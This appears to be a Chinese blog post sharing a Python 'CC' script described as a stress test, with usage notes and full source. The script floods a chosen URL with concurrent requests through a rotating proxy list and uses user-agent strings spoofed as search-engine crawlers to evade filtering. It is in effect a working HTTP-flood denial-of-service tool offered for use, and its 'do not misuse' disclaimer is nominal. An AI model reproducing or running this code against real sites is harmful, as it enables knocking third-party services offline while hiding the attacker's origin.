cc Python3压测脚本

使用说明

同文件配置ip.txt 代理ip库,http\https

请勿违规使用,需要配置集群压力才大!

pip3 install requests
python3 start.py
import random  
import requests  
import concurrent.futures  
import time  
from urllib.parse import urlencode  
import string  
import threading  
  
def generate_random_user_agent():  
    browsers = [  
        'Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)',  
        'Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html)',  
        'Sogou+web+spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)',  
        'Mozilla/5.0+(compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm)',  
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36; 360Spider',  
        'Sosospider/(+http://help.soso.com/webspider.htm)',  
        'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',  
        'Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)',  
        'Mozilla/5.0 (compatible; Bytespider; https://zhanzhang.toutiao.com/) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36',  
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36'  
    ]  
    return random.choice(browsers)  
  
def simulate_access(url, user_agent, proxy):  
    proxies = {  
        'http': f'http://{proxy}',  
        'https': f'https://{proxy}',  
    }  
    headers = {  
        'User-Agent': user_agent  
    }  
    try:  
        response = requests.get(url, headers=headers, proxies=proxies, timeout=5)  
        return response.status_code == requests.codes.ok, response.elapsed.total_seconds() if response.elapsed else None  
    except requests.RequestException:  
        return False, None  
  
def load_proxies_from_file(file_path):  
    with open(file_path, 'r') as file:  
        proxies = [line.strip() for line in file.readlines()]  
    return proxies  
  
def main():  
    print("""  
    老猫压测脚本----请勿违规使用---https://www.laomaoseo.vip/  
    """)  
    TARGET_URL = input("请输入网址: ")  
    concurrency = int(input("请输入并发量: "))  
    duration = int(input("请输入请求时间(秒): "))  
    proxy_file_path = input("请输入代理文件路径(默认为ip.txt): ") or 'ip.txt'  
  
    start_time = time.time()  
    success_count = 0  
    failed_count = 0  
    total_requests = 0  
    total_time = 0  
    all_results = []  
  
    proxies = load_proxies_from_file(proxy_file_path)  
    random.shuffle(proxies)  
  
    success_urls = []  
    failed_urls = []  
  
    base_url = TARGET_URL  
  
    with concurrent.futures.ThreadPoolExecutor(max_workers=concurrency) as executor:  
        while time.time() < start_time + duration:  
            user_agent = generate_random_user_agent()  
            proxy = random.choice(proxies)  
              
            future = executor.submit(simulate_access, base_url, user_agent, proxy)  
            all_results.append(future)  
            total_requests += 1  
  
    concurrent.futures.wait(all_results)  
  
    for future in all_results:  
        success, duration = future.result()  
        if success:  
            success_count += 1  
            success_urls.append(base_url)  
            total_time += duration if duration is not None else 0  
        else:  
            failed_count += 1  
            failed_urls.append(base_url)  
  
    avg_time = total_time / success_count if success_count > 0 else 0  
  
    print(f"总请求次数: {total_requests}")  
    print(f"成功请求数: {success_count}")  
    print(f"失败请求数: {failed_count}")  
    print(f"平均响应时间: {avg_time:.2f}秒")  
  
if __name__ == "__main__":  
    main()
属于什么分类:

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注